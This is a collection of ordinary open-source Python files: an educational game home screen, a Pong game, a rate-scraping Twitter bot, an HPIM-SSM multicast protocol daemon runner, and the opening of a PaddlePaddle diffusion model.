+{"seq_id":"30199303238","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport pygame\nimport classes.board\nimport classes.game_driver as gd\nimport classes.level_controller as lc\nimport classes.menu_items\n\n\nclass Board(gd.BoardGame):\n def __init__(self, mainloop, speaker, config, screen_w, screen_h):\n self.level = lc.Level(self, mainloop, 1, 1)\n gd.BoardGame.__init__(self, mainloop, speaker, config, screen_w, screen_h, 25, 16)\n\n def create_game_objects(self, level=1):\n self.board.draw_grid = False\n self.show_info_btn = False\n self.mainloop.menu_level = 0\n\n self.unit_mouse_over = None\n\n if self.mainloop.scheme is not None:\n if self.mainloop.scheme.dark:\n self.scheme_dir = \"black\"\n color = (0, 0, 0, 0)\n else:\n self.scheme_dir = \"white\"\n color = (255, 255, 255, 0)\n else:\n self.scheme_dir = \"white\"\n color = (255, 255, 255, 0)\n\n self.color = color\n font_color2 = (20, 75, 92)\n self.digits = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n self.imput_limit = 3\n\n data = [25, 16]\n\n x_count = self.get_x_count(data[1], even=False)\n if x_count > 25:\n data[0] = x_count\n\n self.data = data\n\n self.vis_buttons = [0, 0, 0, 0, 1, 0, 1, 0, 0]\n self.mainloop.info.hide_buttonsa(self.vis_buttons)\n self.layout.update_layout(data[0], data[1])\n self.scale = self.layout.scale\n self.board.level_start(data[0], data[1], self.scale)\n self.board.board_bg.initcolor = color\n self.board.board_bg.color = color\n self.board.board_bg.update_me = True\n self.board.board_bg.line_color = (20, 20, 20)\n\n self.last_hover = None\n self.board.add_unit(data[0] - 7, 0, 7, 1, classes.board.Label, \"v.%s\" % self.mainloop.config.version,\n color, \"\", 2)\n self.board.units[-1].align = 2\n self.board.units[-1].font_color = font_color2\n\n # main category item locations and icons\n posx = [data[0] // 2 - 8, data[0] // 2 - 2, data[0] // 2 + 
4]\n ico = [\"ico_tn_00.png\", \"ico_tn_01.png\", \"ico_tn_02.png\"]\n\n # activity quick launch\n self.board.add_unit(posx[1], 13, 5, 1, classes.board.Letter, \"\", color, \"\", 0)\n self.board.ships[-1].font_color = font_color2\n self.board.ships[-1].immobilize()\n\n\n self.board.add_unit(7, 0, data[0]-14, 4, classes.board.ImgCenteredShip, \"\", color, \"home_screen_icon.png\", alpha=True)\n\n self.board.ships[-1].immobilize()\n\n self.board.add_unit(0, 5, data[0], 3, classes.board.ImgCenteredShip, \"\", color,\n os.path.join(\"schemes\", self.scheme_dir, 'home_logo.png'))\n self.board.ships[-1].immobilize()\n\n\n self.board.add_unit((data[0]-11)//2, 14, 11, 2, classes.board.Label,\n [\"www.eduactiv8.org | info%seduactiv8%sorg\" % (\"@\", \".\"),\n \"Copyright (C) 2012 - 2021 Ireneusz Imiolek\"], color, \"\", 3)\n self.board.units[-1].font_color = font_color2\n self.board.units[-1].update_lng_font_size(\"def_2.0\")\n\n self.top_categories = []\n self.units = []\n i = 0\n for each in self.mainloop.m.top_categories:\n self.top_categories.append(each)\n\n unit = classes.menu_items.TopCategory(self, self.top_categories[-1], posx[i], 8, 5, 5,\n i, self.color, ico[i],\n decor=self.mainloop.cl.color_sliders[6][0], sequence_id=i)\n self.units.append(unit)\n self.board.all_sprites_list.add(unit)\n i += 1\n\n #add home info icons\n self.home_icons = [[\"home_icon_1.png\", \"home_icon_2.png\", \"home_icon_3.png\", \"home_icon_4.png\"],\n [\"home_ico_1.png\", \"home_ico_2.png\", \"home_ico_3.png\", \"home_ico_4.png\"]]\n\n self.board.add_unit(data[0]-5, data[1] - 2, 3, 2, classes.board.ImgCenteredShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_1.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n self.board.add_unit(0, data[1]-2, 2, 2, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_2.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n self.board.add_unit((data[0]-11)//2-2, data[1]-2, 2, 2, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_3.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n self.board.add_unit(data[0]//2 + 6, data[1]-2, 2, 2, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", \"home_icon_4.png\"), alpha=True)\n self.board.ships[-1].immobilize()\n\n # add scheme switchers\n if self.mainloop.scheme_code is None:\n img = 'score_hc_anone_l.png'\n else:\n img = 'score_hc_none_l.png'\n self.board.add_unit(data[0]-2, data[1]-2, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n if self.mainloop.scheme_code == \"WB\":\n img = 'score_hc_awb_l.png'\n else:\n img = 'score_hc_wb_l.png'\n self.board.add_unit(data[0]-2, data[1]-1, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n if self.mainloop.scheme_code == \"BW\":\n img = 'score_hc_abw_l.png'\n else:\n img = 'score_hc_bw_l.png'\n self.board.add_unit(data[0]-1, data[1]-2, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n if self.mainloop.scheme_code == \"BY\":\n img = 'score_hc_aby_l.png'\n else:\n img = 'score_hc_by_l.png'\n self.board.add_unit(data[0]-1, data[1]-1, 1, 1, classes.board.ImgShip, \"\", color,\n os.path.join(\"home_icons\", img), alpha=True)\n self.board.ships[-1].immobilize()\n\n # check if espeak icon needs disabling on display of home screen\n if self.lang.lang in 
self.lang.tts_disabled_lngs:\n self.mainloop.sb.espeak_avail(False)\n else:\n self.mainloop.sb.espeak_avail(True)\n\n def handle(self, event):\n gd.BoardGame.handle(self, event)\n if event.type == pygame.KEYDOWN and (event.key != pygame.K_RETURN and event.key != pygame.K_KP_ENTER):\n self.active_unit = self.board.ships[0]\n lhv = len(self.active_unit.value)\n self.changed_since_check = True\n if event.key == pygame.K_BACKSPACE:\n if lhv > 0:\n self.active_unit.value = self.active_unit.value[0:lhv - 1]\n else:\n char = event.unicode\n if len(char) > 0 and (char in self.digits):\n if lhv < self.imput_limit:\n self.active_unit.value += char\n else:\n self.active_unit.value = char\n self.active_unit.update_me = True\n self.mainloop.redraw_needed[0] = True\n elif event.type == pygame.KEYDOWN and (event.key == pygame.K_RETURN or event.key == pygame.K_KP_ENTER):\n lhv = len(self.active_unit.value)\n if lhv > 0:\n try:\n activity_id = int(self.active_unit.value)\n if activity_id > 0:\n self.start_game(activity_id)\n except:\n pass\n\n if event.type == pygame.MOUSEMOTION or event.type == pygame.MOUSEBUTTONUP:\n pos = [event.pos[0] - self.layout.game_left, event.pos[1] - self.layout.top_margin]\n found = False\n for each in self.units:\n if each.rect.left < pos[0] < each.rect.right and each.rect.top < pos[1] < each.rect.bottom:\n if each != self.unit_mouse_over:\n if self.unit_mouse_over is not None:\n self.unit_mouse_over.mouse_out()\n self.unit_mouse_over = each\n found = True\n each.handle(event)\n break\n if not found:\n if self.unit_mouse_over is not None:\n self.unit_mouse_over.mouse_out()\n self.unit_mouse_over = None\n\n if event.type == pygame.MOUSEMOTION:\n pos = [event.pos[0] - self.layout.game_left, event.pos[1] - self.layout.top_margin]\n for i in range(-8, -4):\n if (self.board.ships[i].rect.left < pos[0] < self.board.ships[i].rect.right\n and self.board.ships[i].rect.top < pos[1] < self.board.ships[i].rect.bottom):\n self.board.ships[i].change_image(os.path.join(\"home_icons\", self.home_icons[1][8 + i]))\n self.board.ships[i].update_me = True\n self.mainloop.redraw_needed[0] = True\n else:\n self.board.ships[i].change_image(os.path.join(\"home_icons\", self.home_icons[0][8 + i]))\n self.board.ships[i].update_me = True\n self.mainloop.redraw_needed[0] = True\n\n if event.type == pygame.MOUSEBUTTONUP:\n if event.button == 1:\n active = self.board.active_ship\n if active > 0:\n if self.board.ships[active] == self.board.ships[-4]:\n self.mainloop.switch_scheme(None)\n elif self.board.ships[active] == self.board.ships[-3]:\n self.mainloop.switch_scheme(\"WB\")\n elif self.board.ships[active] == self.board.ships[-2]:\n self.mainloop.switch_scheme(\"BW\")\n elif self.board.ships[active] == self.board.ships[-1]:\n self.mainloop.switch_scheme(\"BY\")\n\n elif self.board.ships[active] == self.board.ships[-8]:\n self.start_game(273)\n elif self.board.ships[active] == self.board.ships[-7]:\n self.start_game(3)\n elif self.board.ships[active] == self.board.ships[-6]:\n self.start_game(1)\n elif self.board.ships[active] == self.board.ships[-5]:\n self.start_game(2)\n\n def start_game(self, gameid):\n game_changed = self.mainloop.m.start_hidden_game(gameid)\n if game_changed:\n self.mainloop.menu_level = 1\n self.mainloop.menu_type = 1\n self.mainloop.info.realign()\n self.mainloop.info.reset_titles()\n else:\n self.board.ships[0].value = \"\"\n self.board.ships[0].update_me = True\n self.mainloop.redraw_needed[0] = True\n\n def update(self, game):\n game.fill(self.color)\n 
gd.BoardGame.update(self, game)\n\n def check_result(self):\n pass\n","repo_name":"imiolek-ireneusz/eduActiv8","sub_path":"game_boards/game000.py","file_name":"game000.py","file_ext":"py","file_size_in_byte":11242,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"81"} +{"seq_id":"12820929624","text":"import pygame\nimport sys\nimport math\nimport time\n\nclass Ball(object):\n def __init__(self, x, y, width, height, vx, vy, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vx = vx\n self.vy = vy\n self.color = color\n\n def render(self, screen):\n pygame.draw.ellipse(screen, self.color, self.rect)\n\n def update(self):\n self.x += self.vx\n self.y += self.vy\n\n @property\n def rect(self):\n return pygame.Rect(self.x, self.y, self.width, self.height)\n\n\nclass Board1(object):\n def __init__(self, x, y, width, height, speed, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vy = 0\n self.speed = speed\n self.color = color\n\n def render(self, screen):\n pygame.draw.rect(screen, self.color, self.rect)\n\n def update(self):\n self.y += self.vy\n\n def key_handler(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n self.vy = -self.speed\n elif event.key == pygame.K_DOWN:\n self.vy = self.speed\n elif event.key in (pygame.K_DOWN, pygame.K_UP):\n self.vy = 0\n\n @property\n def rect(self):\n return pygame.Rect(self.x, self.y, self.width, self.height)\n\nclass Board2(object):\n def __init__(self, x, y, width, height, speed, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.vy = 0\n self.speed = speed\n self.color = color\n\n def render(self, screen):\n pygame.draw.rect(screen, self.color, self.rect)\n\n def update(self):\n self.y += self.vy\n\n def key_handler(self, event):\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_w:\n self.vy = -self.speed\n elif event.key == pygame.K_s:\n self.vy = self.speed\n elif event.key in (pygame.K_w, pygame.K_s):\n self.vy = 0\n\n @property\n def rect(self):\n return pygame.Rect(self.x, self.y, self.width, self.height)\n\nclass Pong(object):\n COLORS = {\"BLACK\": ( 0, 0, 0), \"WHITE\": (255, 255, 255), \"BLUE\": (63, 255, 255)}\n def __init__(self):\n pygame.init()\n (WIDTH, HEIGHT) = (900, 500)\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\n pygame.display.set_caption(\"Ping' Pong\")\n self.ball = Ball(5, 5, 25, 25, 5, 5, Pong.COLORS[\"BLUE\"])\n self.board1 = Board1(WIDTH - 50, HEIGHT / 2, 10, 100, 3, Pong.COLORS[\"BLUE\"])\n self.board2 = Board2(WIDTH - 850, HEIGHT / 2, 10, 100, 3, Pong.COLORS[\"BLUE\"])\n self.score1 = 0\n self.score2 = 0\n self.flag = 0\n\n def reset_all(self):\n self.ball.x = 433\n self.ball.y = 250\n self.ball.width = 25\n self.ball.height = 25\n self.ball.vx = 5\n self.ball.vy = 5\n\n self.board1.x = 850\n self.board1.y = 200\n self.board1.vy = 0\n self.board2.x = 50\n self.board2.y = 200\n self.board2.vy = 0\n\n def endFalg(self, eFlag):\n self.endflag = eFlag\n\n def setFlag(self, nFlag):\n self.flag = nFlag\n\n def play(self): #메인실행\n clock = pygame.time.Clock()\n while True:\n clock.tick(120)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n if event.type in (pygame.KEYDOWN, pygame.KEYUP):\n self.board1.key_handler(event)\n self.board2.key_handler(event)\n if self.flag == 1:\n self.collision_handler()\n self.draw()\n if self.flag == 0:\n if self.endflag == 0:\n time.sleep(5)\n 
pygame.quit()\n sys.exit()\n self.reset_all()\n self.draw()\n time.sleep(1)\n self.flag = 1\n\n def winner(self):\n font = pygame.font.Font(None, 100)\n if self.score1 == 10:\n P1win = font.render(\"P1 Win!\", True, Pong.COLORS[\"BLUE\"])\n self.screen.blit(P1win, (350, 200))\n if self.score2 == 10:\n P2win = font.render(\"P2 Win!\", True, Pong.COLORS[\"BLUE\"])\n self.screen.blit(P2win, (350, 200))\n\n def collision_handler(self):\n if self.ball.rect.colliderect(self.board1.rect): #보드튕김(오른쪽)\n self.ball.vx = -self.ball.vx\n if self.ball.rect.colliderect(self.board2.rect): #보드튕김(왼쪽)\n self.ball.vx = -self.ball.vx\n\n if self.ball.x + self.ball.width >= self.screen.get_width(): #오른쪽\n self.score1 += 1\n self.flag = 0\n elif self.ball.x <= 0: #왼쪽\n self.score2 += 1\n self.flag = 0\n if self.ball.y + self.ball.height >= self.screen.get_height(): #아래\n self.ball.vy = -self.ball.vy\n elif self.ball.y <= 0: #위\n self.ball.vy = math.fabs(self.ball.vy)\n\n if self.board1.y + self.board1.height >= self.screen.get_height():\n self.board1.y = self.screen.get_height() - self.board1.height\n elif self.board1.y <= 0: #보드1 위치 제어\n self.board1.y = 0\n if self.board2.y + self.board2.height >= self.screen.get_height():\n self.board2.y = self.screen.get_height() - self.board2.height\n elif self.board2.y <= 0: #보드2 위치 제어\n self.board2.y = 0\n\n def draw(self):\n self.screen.fill(Pong.COLORS[\"BLACK\"])\n\n font = pygame.font.Font(None, 60)\n score_text1 = font.render(\"P1: \" + str(self.score1), True, Pong.COLORS[\"WHITE\"])\n score_text2 = font.render(\"P2: \" + str(self.score2), True, Pong.COLORS[\"WHITE\"])\n pygame.draw.line(self.screen, pygame.color.Color(255, 255, 255), (450, 0), (450, 500), 1)\n self.screen.blit(score_text1, (300, 0))\n self.screen.blit(score_text2, (510, 0))\n\n self.ball.update()\n self.ball.render(self.screen)\n self.board1.update()\n self.board1.render(self.screen)\n self.board2.update()\n self.board2.render(self.screen)\n\n if self.score1 == 10 or self.score2 == 10:\n self.winner()\n self.endflag = 0\n\n pygame.display.update()\n\nif __name__ == \"__main__\":\n #Pong().play()\n objPong = Pong()\n objPong.setFlag(1)\n objPong.endFalg(1)\n objPong.play()\n","repo_name":"moreek/pingpong-game","sub_path":"pingpong/pingpong.py","file_name":"pingpong.py","file_ext":"py","file_size_in_byte":6599,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"81"} +{"seq_id":"34122886212","text":"from urllib.request import urlopen,Request\r\nfrom bs4 import BeautifulSoup as soup\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom LinksAndLists import *\r\nfrom tweepy_streamer import TwitterClient\r\n\r\n\r\ndef scrape(url):\r\n uClient = urlopen(url)\r\n page = uClient.read()\r\n import codecs\r\n page_soup_html = soup(codecs.decode(page, 'utf-8'), \"html.parser\")\r\n data = page_soup_html.findAll(\"tr\", {\"class\": [\"tabledata1\", \"tabledata2\"]})\r\n return data\r\n\r\n\r\ndef frenchDateToDatetime(str):\r\n str = str.split(sep=\" \")\r\n if len(str) == 3: # Day Month Year\r\n str[0], str[1] = str[1], str[0]\r\n str[0] = month_swap_dict[str[0]]\r\n return datetime.strptime(str[0] + \" \" + str[1] + \" \" + str[2], '%b %d %Y')\r\n else:\r\n str[0] = month_swap_dict[str[0].strip('%\\xa0')]\r\n return datetime.strptime(str[0] + \" \" + str[1], '%b %Y')\r\n\r\n\r\nclass InflationContainer:\r\n def __init__(self, urlIndex):\r\n self.tag = urlIndex\r\n self.url = url_dict_inflation[urlIndex]\r\n self.data = 
scrape(self.url)\r\n self.Monthly = self.getMonthly()\r\n self.Yearly = self.getYearly()\r\n self.data = None\r\n\r\n def getMonthly(self):\r\n df_monthly = pd.DataFrame(columns=['Taux'])\r\n for i in range(10):\r\n element = self.data[i].findAll('td')\r\n df_monthly.loc[frenchDateToDatetime(element[0].text)] = [\r\n float(element[1].text.strip('%\\xa0').replace(',', '.'))]\r\n return df_monthly\r\n\r\n def getYearly(self):\r\n df_yearly = pd.DataFrame(columns=['Taux'])\r\n for i in range(10, 20):\r\n element = self.data[i].findAll('td')\r\n df_yearly.loc[frenchDateToDatetime(element[0].text)] = [\r\n float(element[1].text.strip('%\\xa0').replace(',', '.'))]\r\n return df_yearly\r\n\r\n def refresh(self):\r\n self.data = scrape(self.url)\r\n self.getMonthly()\r\n self.getYearly()\r\n self.data = None\r\n\r\n\r\nclass governmentRateContainer:\r\n def __init__(self):\r\n self.url = \"https://fr.global-rates.com/taux-de-interets/banques-centrales/banque-centrale-europeenne/taux-de-bce.aspx\"\r\n self.data = self.governmentRates()\r\n\r\n def governmentRates(self):\r\n data = scrape(self.url)\r\n govRates = pd.DataFrame(columns=['Titre', 'Taux', 'Date changement'])\r\n for i in range(10, 20):\r\n infos = data[i].find_all('td')\r\n govRates.loc[i - 10] = (infos[0].text, infos[2].text, infos[3].text)\r\n return govRates\r\n\r\n def checkGovernmentRateChange(self,publisher):\r\n data = self.governmentRates()\r\n truth = np.where(data['Date changement'] == self.data['Date changement'])[0]\r\n if len(truth) > 0:\r\n message = \"\"\r\n for i in truth:\r\n m = data.loc[i]\r\n message += \" \".join([\"Nouveau taux\", m['Titre'], m['Taux']]) + '\\n'\r\n self.data = data\r\n publisher.publish_tweet(message)\r\n\r\n\r\n","repo_name":"youssk541/fnstatz","sub_path":"docs/webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"33390372228","text":"import pickle\nimport argparse\nimport os\nimport socket\nimport sys\nimport traceback\n\nimport Main\nfrom Daemon.Daemon import Daemon\n\nVERSION = \"1.2.1.2\"\n\ndef client_socket(data_to_send):\n \"\"\"\n Send command to daemon process through a socket\n \"\"\"\n # Create a UDS socket\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\n # Connect the socket to the port where the server is listening\n server_address = '/tmp/hpim_uds_socket'\n #print('connecting to %s' % server_address)\n try:\n print(\"in_client_socket_function\")\n sock.connect(server_address)\n sock.sendall(pickle.dumps(data_to_send))\n data_rcv = sock.recv(1024 * 256)\n if data_rcv:\n print(pickle.loads(data_rcv))\n except socket.error:\n pass\n finally:\n #print('closing socket')\n sock.close()\n\n\nclass MyDaemon(Daemon):\n def run(self):\n \"\"\"\n Daemon process will run this method until the daemon process explicitly is stopped\n \"\"\"\n Main.main()\n server_address = '/tmp/hpim_uds_socket'\n\n # Make sure the socket does not already exist\n try:\n os.unlink(server_address)\n except OSError:\n if os.path.exists(server_address):\n raise\n\n # Create a UDS socket\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n\n # Bind the socket to the port\n sock.bind(server_address)\n\n # Listen for incoming connections\n sock.listen(1)\n while True:\n try:\n connection, client_address = sock.accept()\n data = connection.recv(256 * 1024)\n print(sys.stderr, 'sending data back to the client')\n print(pickle.loads(data))\n args = 
pickle.loads(data)\n if 'list_interfaces' in args and args.list_interfaces:\n connection.sendall(pickle.dumps(Main.list_enabled_interfaces()))\n elif 'list_neighbors' in args and args.list_neighbors:\n connection.sendall(pickle.dumps(Main.list_neighbors()))\n elif 'list_state' in args and args.list_state:\n connection.sendall(pickle.dumps(Main.list_state()))\n elif 'list_neighbors_state' in args and args.list_neighbors_state:\n connection.sendall(pickle.dumps(Main.list_neighbors_state()))\n elif 'list_sequence_numbers' in args and args.list_sequence_numbers:\n connection.sendall(pickle.dumps(Main.list_sequence_numbers()))\n elif 'add_interface' in args and args.add_interface:\n Main.add_protocol_interface(args.add_interface[0])\n connection.shutdown(socket.SHUT_RDWR)\n elif 'hold_forwarding_state' in args and args.hold_forwarding_state:\n connection.sendall(pickle.dumps(Main.hold_forwarding_state()))\n elif 'add_interface_igmp' in args and args.add_interface_igmp:\n Main.add_igmp_interface(args.add_interface_igmp[0])\n connection.shutdown(socket.SHUT_RDWR)\n elif 'remove_interface' in args and args.remove_interface:\n Main.remove_interface(args.remove_interface[0], pim=True)\n connection.shutdown(socket.SHUT_RDWR)\n elif 'remove_interface_igmp' in args and args.remove_interface_igmp:\n Main.remove_interface(args.remove_interface_igmp[0], igmp=True)\n connection.shutdown(socket.SHUT_RDWR)\n elif 'list_hmac_algorithms' in args and args.list_hmac_algorithms:\n connection.sendall(pickle.dumps(Main.list_hash_algorithms()))\n elif 'add_interface_security' in args and args.add_interface_security:\n Main.add_security_key(args.add_interface_security[0], int(args.add_interface_security[1]),\n args.add_interface_security[2], args.add_interface_security[3])\n connection.shutdown(socket.SHUT_RDWR)\n elif 'remove_interface_security' in args and args.remove_interface_security:\n Main.remove_security_key(args.remove_interface_security[0], int(args.remove_interface_security[1]))\n connection.shutdown(socket.SHUT_RDWR)\n elif 'stop' in args and args.stop:\n Main.stop()\n connection.shutdown(socket.SHUT_RDWR)\n elif 'test' in args and args.test:\n Main.test(args.test[0], args.test[1])\n connection.shutdown(socket.SHUT_RDWR)\n # elif 'send_join' in args and args.send_join:\n # Main.send_force_join(args.send_join[0])\n # connection.shutdown(socket.SHUT_RDWR)\n # elif 'send_prune' in args and args.send_prune:\n # Main.send_force_prune(args.send_prune[0])\n # connection.shutdown(socket.SHUT_RDWR)\n except Exception:\n connection.shutdown(socket.SHUT_RDWR)\n traceback.print_exc()\n finally:\n # Clean up the connection\n connection.close()\n\n\ndef main():\n \"\"\"\n Entry point for HPIM-SSM\n \"\"\"\n parser = argparse.ArgumentParser(description='HPIM-SSM protocol', prog='hpim-ssm')\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument(\"-start\", \"--start\", action=\"store_true\", default=False,\n help=\"Start Protocol\")\n group.add_argument(\"-stop\", \"--stop\", action=\"store_true\", default=False,\n help=\"Stop Protocol\")\n group.add_argument(\"-restart\", \"--restart\", action=\"store_true\", default=False,\n help=\"Restart Protocol\")\n group.add_argument(\"-li\", \"--list_interfaces\", action=\"store_true\", default=False,\n help=\"List All Interfaces\")\n group.add_argument(\"-ln\", \"--list_neighbors\", action=\"store_true\", default=False,\n help=\"List All Neighbors\")\n group.add_argument(\"-ls\", \"--list_state\", action=\"store_true\", default=False,\n help=\"List 
state of IGMP and HPIM-SSM\")\n group.add_argument(\"-lns\", \"--list_neighbors_state\", action=\"store_true\", default=False,\n help=\"List Upstream and Interest state of all neighbors\")\n group.add_argument(\"-lsn\", \"--list_sequence_numbers\", action=\"store_true\", default=False,\n help=\"List Sequence Numbers\")\n group.add_argument(\"-mr\", \"--multicast_routes\", action=\"store_true\", default=False,\n help=\"List Multicast Routing table\")\n group.add_argument(\"-hfs\", \"--hold_forwarding_state\", action=\"store_true\", default=False,\n help=\"Hold forwarding state during a small amount of time after AW interface becomes AL \" +\\\n \"(prevent loss of data packets after AW replacement)\")\n group.add_argument(\"-ai\", \"--add_interface\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Add HPIM-SSM interface\")\n group.add_argument(\"-aiigmp\", \"--add_interface_igmp\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Add IGMP interface\")\n group.add_argument(\"-ri\", \"--remove_interface\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Remove HPIM-SSM interface\")\n group.add_argument(\"-riigmp\", \"--remove_interface_igmp\", nargs=1, metavar='INTERFACE_NAME',\n help=\"Remove IGMP interface\")\n group.add_argument(\"-lsec\", \"--list_hmac_algorithms\", action=\"store_true\", default=False,\n help=\"List available HMAC Hash algorithms\")\n group.add_argument(\"-aisec\", \"--add_interface_security\", nargs=4, metavar=('INTERFACE_NAME', \"SECURITY_IDENTIFIER\",\n \"HASH_FUNCTION\", \"KEY\"),\n help=\"Add security information to interface INTERFACE_NAME. Control messages will be secured \" +\n \" with SECURITY_IDENTIFIER, HMAC algorithm based on HASH_FUNCTION and key KEY.\" +\n \" To determine available hash functions run -lsec command\")\n group.add_argument(\"-risec\", \"--remove_interface_security\", nargs=2, metavar=('INTERFACE_NAME', \"SECURITY_IDENTIFIER\"),\n help=\"Remove security information identified by SECURITY_IDENTIFIER from interface INTERFACE_NAME.\")\n group.add_argument(\"-v\", \"--verbose\", action=\"store_true\", default=False,\n help=\"Verbose (print all debug messages)\")\n group.add_argument(\"-t\", \"--test\", nargs=2, metavar=('ROUTER_NAME', 'SERVER_LOG_IP'),\n help=\"Tester... send log information to SERVER_LOG_IP. 
Set the router name to ROUTER_NAME\")\n group.add_argument(\"--version\", action='version', version='%(prog)s ' + VERSION)\n # group.add_argument(\"-sj\", \"--send_join\", nargs=1, metavar='INTERFACE_NAME', help=\"Send force Join\")\n # group.add_argument(\"-sp\", \"--send_prune\", nargs=1, metavar='INTERFACE_NAME', help=\"Send force Prune\")\n args = parser.parse_args()\n\n #print(parser.parse_args())\n # This script must be run as root!\n if os.geteuid() != 0:\n sys.exit('HPIM-SSM must be run as root!')\n\n daemon = MyDaemon('/tmp/Daemon-hpim.pid')\n if args.start:\n print(\"start\")\n daemon.start()\n sys.exit(0)\n elif args.stop:\n client_socket(args)\n daemon.stop()\n sys.exit(0)\n elif args.restart:\n daemon.restart()\n sys.exit(0)\n elif args.verbose:\n os.system(\"tail -f /var/log/hpimssm/stdout\")\n sys.exit(0)\n elif args.multicast_routes:\n os.system(\"ip mroute show\")\n sys.exit(0)\n elif not daemon.is_running():\n print(\"HPIM-SSM is not running\")\n parser.print_usage()\n sys.exit(0)\n\n client_socket(args)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"CatarinaGrilo/HPIM-SSM","sub_path":"hpim_ssm/Run.py","file_name":"Run.py","file_ext":"py","file_size_in_byte":10076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26677157202","text":"import math\r\nimport numpy as np\r\n\r\nimport paddle\r\nimport paddle.nn as nn\r\nimport paddle.nn.functional as F\r\n\r\n\r\ndef make_beta_schedule(\r\n schedule, n_timestep, linear_start=1e-4, linear_end=2e-2, cosine_s=8e-3\r\n):\r\n if schedule == \"linear\":\r\n betas = (\r\n paddle.linspace(\r\n linear_start ** 0.5, linear_end ** 0.5, n_timestep, dtype=np.float64\r\n )\r\n ** 2\r\n )\r\n\r\n elif schedule == \"cosine\":\r\n timesteps = (\r\n paddle.arange(n_timestep + 1, dtype=np.float64) / n_timestep + cosine_s\r\n )\r\n alphas = timesteps / (1 + cosine_s) * math.pi / 2\r\n alphas = paddle.cos(alphas).pow(2)\r\n alphas = alphas / alphas[0]\r\n betas = 1 - alphas[1:] / alphas[:-1]\r\n betas = betas.clip(max=0.999)\r\n\r\n return betas\r\n\r\n\r\ndef extract(input, t, shape):\r\n bs, = t.shape\r\n assert shape[0] == bs\r\n out = paddle.gather(input, t)\r\n assert out.shape == [bs]\r\n return paddle.reshape(out, [bs] + ((len(shape) - 1) * [1]))\r\n\r\n\r\ndef noise_like(shape, noise_fn, repeat=False):\r\n if repeat:\r\n resid = [1] * (len(shape) - 1)\r\n shape_one = (1, *shape[1:])\r\n\r\n return noise_fn(shape_one).tile([shape[0], *resid])\r\n\r\n else:\r\n return noise_fn(shape)\r\n\r\n\r\nclass GaussianDiffusion(nn.Layer):\r\n def __init__(self, betas):\r\n super().__init__()\r\n\r\n betas = betas.astype(np.float64)\r\n timesteps = betas.shape[0]\r\n self.num_timesteps = int(timesteps)\r\n\r\n alphas = 1 - betas\r\n alphas_cumprod = paddle.to_tensor(np.cumprod(alphas.numpy(), 0))\r\n alphas_cumprod_prev = paddle.concat(\r\n (paddle.to_tensor([1], dtype=np.float64), alphas_cumprod[:-1]), 0\r\n )\r\n posterior_variance = betas * (1 - alphas_cumprod_prev) / (1 - alphas_cumprod)\r\n\r\n self.register(\"betas\", betas)\r\n self.register(\"alphas_cumprod\", alphas_cumprod)\r\n self.register(\"alphas_cumprod_prev\", alphas_cumprod_prev)\r\n\r\n self.register(\"sqrt_alphas_cumprod\", paddle.sqrt(alphas_cumprod))\r\n self.register(\"sqrt_one_minus_alphas_cumprod\", paddle.sqrt(1 - alphas_cumprod))\r\n self.register(\"log_one_minus_alphas_cumprod\", paddle.log(1 - alphas_cumprod))\r\n self.register(\"sqrt_recip_alphas_cumprod\", paddle.rsqrt(alphas_cumprod))\r\n 
